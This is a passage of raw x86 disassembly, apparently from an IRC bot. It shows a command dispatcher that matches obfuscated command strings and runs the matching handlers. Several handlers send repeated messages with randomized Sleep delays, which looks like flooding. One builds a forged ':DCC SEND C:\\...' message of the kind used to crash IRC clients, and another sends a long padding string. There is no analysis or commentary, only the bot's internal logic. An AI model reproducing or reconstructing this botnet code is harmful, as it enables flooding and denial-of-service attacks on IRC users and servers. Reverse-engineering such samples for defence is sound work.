idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_12CAC]
push edx
push offset dword_435610
push eax
call sub_422063
lea eax, [ebp+var_12CAC]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
add esp, 0D0h
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
pop ecx
loc_40630A: ; CODE XREF: sub_403B2C+2565�j
; sub_403B2C+256E�j
push dword ptr [esi+4]
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406525
mov eax, [esi+0Ch]
test eax, eax
jz loc_406525
push eax
lea eax, [ebp+var_44E4]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40638E
loc_40634C: ; CODE XREF: sub_403B2C+2860�j
mov eax, [ebp+arg_C]
mov eax, [esi+eax*4]
test eax, eax
jz short loc_406383
push eax
lea eax, [ebp+var_6CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_6CAC]
push 100h
push eax
lea eax, [ebp+var_44E4]
push eax
call sub_421F40
add esp, 18h
loc_406383: ; CODE XREF: sub_403B2C+2828�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40634C
loc_40638E: ; CODE XREF: sub_403B2C+281E�j
lea eax, [ebp+var_44E4]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_435600
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355DC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355CC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355CC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
loc_406525: ; CODE XREF: sub_403B2C+27EF�j
; sub_403B2C+27FA�j
push dword ptr [esi+4]
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_4065F1
cmp [esi+8], eax
jz loc_4065F1
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
loc_4065F1: ; CODE XREF: sub_403B2C+2A0A�j
; sub_403B2C+2A13�j
push dword ptr [esi+4]
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_4066A4
mov eax, [esi+0Ch]
test eax, eax
jz loc_4066A4
push eax
lea eax, [ebp+var_46E8]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_406675
loc_406633: ; CODE XREF: sub_403B2C+2B47�j
mov eax, [ebp+arg_C]
mov eax, [esi+eax*4]
test eax, eax
jz short loc_40666A
push eax
lea eax, [ebp+var_6CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_6CAC]
push 100h
push eax
lea eax, [ebp+var_46E8]
push eax
call sub_421F40
add esp, 18h
loc_40666A: ; CODE XREF: sub_403B2C+2B0F�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_406633
loc_406675: ; CODE XREF: sub_403B2C+2B05�j
lea eax, [ebp+var_46E8]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_4066A4: ; CODE XREF: sub_403B2C+2AD6�j
; sub_403B2C+2AE1�j
push dword ptr [esi+4]
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406757
mov eax, [esi+0Ch]
test eax, eax
jz loc_406757
push eax
lea eax, [ebp+var_3FDC]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_406728
loc_4066E6: ; CODE XREF: sub_403B2C+2BFA�j
mov eax, [ebp+arg_C]
mov eax, [esi+eax*4]
test eax, eax
jz short loc_40671D
push eax
lea eax, [ebp+var_6CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_6CAC]
push 100h
push eax
lea eax, [ebp+var_3FDC]
push eax
call sub_421F40
add esp, 18h
loc_40671D: ; CODE XREF: sub_403B2C+2BC2�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_4066E6
loc_406728: ; CODE XREF: sub_403B2C+2BB8�j
lea eax, [ebp+var_3FDC]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C0A0
push offset dword_4355C0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_406757: ; CODE XREF: sub_403B2C+2B89�j
; sub_403B2C+2B94�j
push dword ptr [esi+4]
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_406797
mov eax, [esi+8]
test eax, eax
jz short loc_406797
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
push eax
lea eax, [ebp+var_3150]
push offset dword_4355B0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
loc_406797: ; CODE XREF: sub_403B2C+2C3C�j
; sub_403B2C+2C43�j
push dword ptr [esi+4]
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_40683C
mov ecx, [esi+8]
test ecx, ecx
jz loc_40683C
mov eax, [esi+0Ch]
test eax, eax
jz short loc_406815
push eax
push ecx
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset dword_4355C0
push eax
call sub_422063
add esp, 14h
jmp short loc_40682F
; ---------------------------------------------------------------------------
loc_4067DD: ; CODE XREF: sub_403B2C+23D5�j
; sub_403B2C+23DE�j ...
cmp [ebp+arg_14], ecx
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
jnz short loc_406802
cmp [ebp+arg_18], ecx
jnz short loc_40680B
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
xor ecx, ecx
loc_406802: ; CODE XREF: sub_403B2C+2CB9�j
cmp [ebp+arg_18], ecx
loc_406805: ; CODE XREF: sub_403B2C+3ACF�j
jz loc_40AF54
loc_40680B: ; CODE XREF: sub_403B2C+2CBE�j
; sub_403B2C+3AB2�j
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
jmp loc_40ADA0
; ---------------------------------------------------------------------------
loc_406815: ; CODE XREF: sub_403B2C+2C92�j
push ecx
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
add esp, 10h
loc_40682F: ; CODE XREF: sub_403B2C+2CAF�j
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
pop ecx
loc_40683C: ; CODE XREF: sub_403B2C+2C7C�j
; sub_403B2C+2C87�j
push dword ptr [esi+4]
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40687C
mov eax, [esi+8]
test eax, eax
jz short loc_40687C
push eax
push offset aZ_0 ; "=Z]"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
loc_40687C: ; CODE XREF: sub_403B2C+2D21�j
; sub_403B2C+2D28�j
push dword ptr [esi+4]
push offset aIegud0v_5_ ; "iEguD0V/.5/."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4068C1
mov eax, [esi+8]
test eax, eax
jz short loc_4068C1
push offset aXs_gx1codil0ip ; "XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
push eax
push offset aZ_0 ; "=Z]"
lea eax, [ebp+var_3150]
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_4068C1: ; CODE XREF: sub_403B2C+2D61�j
; sub_403B2C+2D68�j
push dword ptr [esi+4]
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_406933
cmp [esi+8], eax
jz short loc_406933
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
call sub_4220FC
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_1748]
push edx
push dword ptr [esi+8]
push offset dword_4355A8
push eax
call sub_422063
lea eax, [ebp+var_1748]
push eax
push offset dword_43C088
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 28h
loc_406933: ; CODE XREF: sub_403B2C+2DA6�j
; sub_403B2C+2DAB�j
push dword ptr [esi+4]
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406A88
mov eax, [esi+8]
test eax, eax
jz loc_406A88
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push offset aXs_gx1codil0ip ; "XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset aZ_0 ; "=Z]"
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 2Ch
call sub_4220FC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset aTf ; "'TF"
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aXs_gx1codil0ip ; "XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset aZ_0 ; "=Z]"
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset aTf ; "'TF"
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 2Ch
call sub_4220FC
cdq
mov ecx, 0C8h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aXs_gx1codil0ip ; "XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECo"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset aZ_0 ; "=Z]"
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_406A88: ; CODE XREF: sub_403B2C+2E18�j
; sub_403B2C+2E23�j
push dword ptr [esi+4]
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406E68
cmp [esi+8], eax
jz loc_406E68
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
call sub_4220FC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 41h
mov byte ptr [ebp+arg_C+3], dl
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
movsx eax, byte ptr [ebp+arg_C+3]
push edx
push eax
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_4220FC
push 0Fh
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_ECAC]
push edx
push offset dword_435500
push eax
call sub_422063
push 7D0h
push 400h
call sub_41409E
add esp, 0C4h
push eax
lea eax, [ebp+var_1ACAC]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4354C4
push eax
call sub_422063
push 7D0h
push 400h
call sub_41409E
add esp, 1Ch
push eax
call sub_4220FC
cdq
mov ecx, 5F5E0FFh
idiv ecx
lea eax, [ebp+var_BCAC]
push edx
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_435478
push eax
call sub_422063
push 7D0h
push 400h
call sub_41409E
add esp, 20h
push eax
call sub_4220FC
cdq
mov ecx, 5F5E0FFh
idiv ecx
push edx
push dword ptr [esi+8]
push offset dword_43C078
lea eax, [ebp+var_DCAC]
push offset dword_43544C
push eax
call sub_422063
push 7D0h
push 400h
call sub_41409E
push eax
lea eax, [ebp+var_ECAC]
push eax
lea eax, [ebp+var_FCAC]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_435428
push eax
call sub_422063
add esp, 38h
call sub_40323F
push eax
lea eax, [ebp+var_ECAC]
push eax
call sub_40323F
push eax
lea eax, [ebp+var_11CAC]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_435410
push eax
call sub_422063
lea eax, [ebp+var_ECAC]
push eax
lea eax, [ebp+var_13CAC]
push dword ptr [esi+8]
push offset dword_43C078
push offset aSSDccSendCS ; "%s %s :DCC SEND C:\\\\\\\\%s"
push eax
call sub_422063
lea eax, [ebp+var_1ACAC]
push eax
call sub_4032AA
lea eax, [ebp+var_BCAC]
push eax
call sub_4032AA
lea eax, [ebp+var_DCAC]
push eax
call sub_4032AA
lea eax, [ebp+var_FCAC]
push eax
call sub_4032AA
add esp, 40h
lea eax, [ebp+var_11CAC]
push eax
call sub_4032AA
lea eax, [ebp+var_13CAC]
push eax
call sub_4032AA
pop ecx
pop ecx
loc_406E68: ; CODE XREF: sub_403B2C+2F6D�j
; sub_403B2C+2F76�j
push dword ptr [esi+4]
push offset aJdzdp05e7aw_ ; "jdZDp05E7aW."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_406ECB
cmp [esi+8], eax
jz short loc_406ECB
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
mov [esp+10h+var_10], 7D0h
push 400h
call sub_41409E
push eax
push offset aAAAAAAAAAAAAAA ; "a a a a a a a a a a a a a a a a a a a a"...
push dword ptr [esi+8]
lea eax, [ebp+var_15CAC]
push offset dword_43C078
push offset dword_4352C0
push eax
call sub_422063
lea eax, [ebp+var_15CAC]
push eax
call sub_4032AA
add esp, 24h
loc_406ECB: ; CODE XREF: sub_403B2C+334D�j
; sub_403B2C+3352�j
push dword ptr [esi+4]
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_406FE0
mov eax, [esi+8]
test eax, eax
jz loc_406FE0
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
lea eax, [ebp+var_270]
push eax
call sub_403625
lea eax, [ebp+var_270]
push eax
push offset dword_43C088
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 2Ch
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
lea eax, [ebp+var_270]
push eax
call sub_403625
lea eax, [ebp+var_270]
push eax
push offset dword_43C088
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 1F4h
idiv ecx
push edx
call dword_42F15C ; Sleep
lea eax, [ebp+var_270]
push eax
call sub_403625
lea eax, [ebp+var_270]
push eax
push offset dword_43C088
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_406FE0: ; CODE XREF: sub_403B2C+33B0�j
; sub_403B2C+33BB�j
push dword ptr [esi+4]
push offset aZat3j_lm3ge1 ; "zAT3J.lm3Ge1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40702B
lea eax, [ebp+var_1710]
push eax
call sub_403625
lea eax, [ebp+var_1710]
push eax
push offset dword_43C088
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_40702B: ; CODE XREF: sub_403B2C+34C5�j
push dword ptr [esi+4]
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_40711F
mov eax, [esi+8]
test eax, eax
jz loc_40711F
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
loc_40707B: ; DATA XREF: .text:00438E1C�o
; .text:00438E30�o ...
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 2Ch
call sub_4220FC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_40711F: ; CODE XREF: sub_403B2C+3510�j
; sub_403B2C+351B�j
push dword ptr [esi+4]
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_407213
mov eax, [esi+8]
test eax, eax
jz loc_407213
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 2Ch
call sub_4220FC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_407213: ; CODE XREF: sub_403B2C+3604�j
; sub_403B2C+360F�j
push dword ptr [esi+4]
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_407334
mov eax, [esi+8]
test eax, eax
jz loc_407334
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 28h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355DC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355CC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355CC
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 14h
loc_407334: ; CODE XREF: sub_403B2C+36F8�j
; sub_403B2C+3703�j
push dword ptr [esi+4]
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_407464
mov eax, [esi+8]
test eax, eax
jz loc_407464
push eax
push offset aTf ; "'TF"
lea eax, [ebp+var_3150]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
push dword ptr [esi+8]
lea eax, [ebp+var_3150]
push offset dword_43C078
push offset dword_4355F0
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 28h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset dword_4356C8
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
call sub_4220FC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_42F15C ; Sleep
push offset aYwxiw_hzl400fd ; "yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd"...
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C080
push offset dword_4356C8
push eax
call sub_422063
